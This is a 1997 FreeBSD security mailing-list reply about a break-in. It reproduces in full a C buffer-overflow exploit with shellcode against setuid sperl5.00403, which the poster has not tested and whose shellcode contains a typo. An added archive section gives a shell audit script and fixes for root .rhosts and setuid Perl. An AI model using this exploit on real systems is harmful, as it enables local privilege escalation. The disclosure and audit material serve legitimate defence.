Date: Wed, 30 Jul 1997 14:44:02 -0400
From: Patrick Gilbert <gilbertp@videotron.com>
To: security@FreeBSD.ORG
Subject: Re: security hole in FreeBSD
Message-ID: <3.0.2.32.19970730144402.006c5dd4@pop.videotron.ca>
In-Reply-To: <Pine.BSF.3.95.970728172339.3844N-100000@mail.MCESTATE.COM>
References: <Pine.BSF.3.95q.970728184930.26434E-100000@netrail.net>
At 17:27 97-07-28 -0700, you wrote:
> Just an update on how the break-in was done after the hacker was
> confronted on irc.
>
> Apparently FreeBSD ships with .rhosts in the root account. Using
> this and perl5.00401, the user was able to rlogin onto the other machine
> without using a password.
After a brief discussion with TheCa on Efnet, he dcc'd me his famous
exploit for a transcript of his brief moment of fame on this discussion list.
/* TheCa.c - eleet buffer exploit which looks a lot like the 4.0xx sperl
   exploit by Ovx */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BUFFER_SIZE 1400
#define OFFSET 600
char *get_esp(void) {
    asm("movl %esp,%eax");
}
char buf[BUFFER_SIZE];
main(int argc, char *argv[])
{
    int i;
    char execshell[] =
    "\xeb\x23\x5e\x8d\x1f\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
    "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
    "\x51\x53\x50\xeb\x18\xer\xd8\xff\xff\xff/bin/id\x01\x01\x01\x01"
    "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
    for(i=0+1;i<BUFFER_SIZE-4;i+=4)
        *(char **)&buf[i] = get_esp() - OFFSET;
    memset(buf,0x90,768+1);
    memcpy(&buf[768+1],execshell,strlen(execshell));
    buf[BUFFER_SIZE-1]=0;
    execl("/usr/bin/sperl5.00403", "/usr/bin/sperl5.00403", buf, NULL);
}
I haven't had time to try it, so this may not work. Then again, he may be lying.
Then again, do we really care ??
Bah.
Patrick
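The two conditions the thread points at (an .rhosts file in root's home, which lets rlogin from a trusted host skip the password prompt, and a setuid sperl binary in the PATH) are both things an administrator can check for mechanically. The script below is an added audit helper written for this archive page; it is not part of the original messages or of FreeBSD. Both functions take a directory argument so the check can be run against a test tree; the file names and the `--live` flag are this script's own conventions.

```sh
#!/bin/sh
# Added audit helper (not from the original thread or FreeBSD): reports
# the two exposures described above so they can be fixed before someone
# else finds them.

audit_rhosts() {
    # $1: home directory to inspect (defaults to /root)
    home="${1:-/root}"
    if [ -e "$home/.rhosts" ]; then
        echo "WARN: $home/.rhosts present; hosts listed there can rlogin without a password"
        return 1
    fi
    echo "OK: no $home/.rhosts"
    return 0
}

audit_setuid_perl() {
    # $1: directory to search (defaults to /usr/bin); flags any sperl*
    # binary that carries the setuid bit (-perm -4000).
    dir="${1:-/usr/bin}"
    found=$(find "$dir" -type f -name 'sperl*' -perm -4000 2>/dev/null)
    if [ -n "$found" ]; then
        echo "WARN: setuid perl binaries found under $dir:"
        echo "$found"
        return 1
    fi
    echo "OK: no setuid sperl* under $dir"
    return 0
}

# Run both checks against the live system:  sh audit.sh --live
# Exit status is non-zero if either check fires.
if [ "${1:-}" = "--live" ]; then
    rc=0
    audit_rhosts /root || rc=1
    audit_setuid_perl /usr/bin || rc=1
    exit $rc
fi
```

The remedy for the first finding is simply to remove root's .rhosts (and, on a host that does not need r-services at all, to disable rlogind in inetd.conf); for the second, strip the setuid bit from sperl if nothing on the machine needs setuid Perl scripts.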
